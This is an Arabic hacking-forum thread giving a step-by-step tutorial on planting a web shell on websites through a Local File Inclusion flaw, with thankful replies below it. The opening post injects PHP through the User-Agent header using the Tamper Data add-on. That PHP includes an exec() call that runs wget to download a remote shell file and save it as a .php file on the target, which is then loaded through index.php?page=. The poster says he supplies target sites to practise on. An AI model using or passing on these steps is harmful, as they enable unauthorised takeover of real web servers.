1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] رفع الشل من خلال ثغرات LFI عبر Tamper Data

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Dr.reo, بتاريخ ‏29 مايو 2012.

كاتب الموضوع : Dr.reo المشاهدات : 14,906 الردود : 22 ‏29 مايو 2012
حالة الموضوع:
مغلق
  1. غير متصل

    Dr.reo
    rank
    Developer

    عضو منذ:
    ‏6 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

    حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

    المتطلبات
    1. FireFox
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    2. Tamper Data
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    والموقع المراد التطبيق علية

    انا جبت لكم كم موقع

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    طيب نكمل

    في البداية لازم نقدر نقرى proc/self/environ

    [​IMG]


    بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا


    [​IMG]

    بعد ماتشتغل معنا الاداة

    نروح لم

    [​IMG]

    بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة

    [​IMG]

    بعدها نروح للمربع هاذا

    [​IMG]

    [​IMG]

    في هاذا المربع وضعنا

    <?php phpinfo();?>


    عشان نقرة phpinfo ونضمن الشغل

    بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل

    [​IMG]

    بعدها ماتضغط وتتخطى

    يفتح الموقع ويتم قراة phpinfo

    [​IMG]


    ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل

    [​IMG]

    <?exec('wget
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    h e l l.txt -O *****.php');?>

    هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
    الى chmod
    system

    ومع شوي تطوير راح تضبط

    بعدها

    نروح نشوف

    راح يفتح الموقع مثل ماكان

    طيب لما تنتهي من الحقن مثال هل الموقع
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    نمسح
    index.php?page=/etc/passwd

    ونحط
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    h e l l.php

    [​IMG]

    وباذن الله راح يتم الرفع الشل

    اتمنا الشرح ماهو مكرر

    اخوكم Dr.abolalh
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    Mr.L4iVe
    rank
    Developer

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    Tamper Data


    أداة رهيبة وممكن نتسفيد منها بشكل كبير

    في إختراق المواقع وبالأخص مراكز الرفع

    بارك الله فيك أخي ولا تحرمنا من جديدك
     


  3. غير متصل

    black.boy
    rank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    شرح رووووعة يعطيك الف عافية




     


  4. غير متصل

    قاتل مأجور
    rank
    V • I • P

    عضو منذ:
    ‏26 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    السلام عليكم
    بارك الله فيك يابطل شرح رائع
    مع العلم الشرح موجود بالمنتدى طرح احد الأخوان لكن هذا لايمنعي من شكرك
    تم تقيمك قبل الرد
    بالتوفيق لك
    اخوك
     


  5. غير متصل

    kasm
    DeveloPer Plus

    عضو منذ:
    ‏6 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    بارك الله فيك &:":

     


  6. غير متصل

    RiskY
    rankrank
    Developer

    عضو منذ:
    ‏20 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    تسلم ربي يخليك يا كفوووو

    لا هنت آخوي العزيز
     


  7. غير متصل

    Assassin_Jpg
    rankrank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    مشكووور يا حبيبي على الموضوع الرائغ
    موفقـــ&:":
     


  8. غير متصل

    Dr.Toni
    rank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data


    مشڪْوَرٍ يًآغآلِيً آلِلِه يًعّطيًڪْ آلِعّآفيًة
     


  9. غير متصل

    яднїм
    rankrank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    ҢαƆк
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    عليكم السلام و الرحمه
    بارك الله فيك
     


  10. غير متصل

    Mr.Click
    rank
    Developer

    عضو منذ:
    ‏19 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    مختبر ختراق !
    الإقامة:

    رد: رفع الشل من خلال ثغرات LFI عبر Tamper Data

    يعطيك الف عافية &:":
    تم تقييمك استمر
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...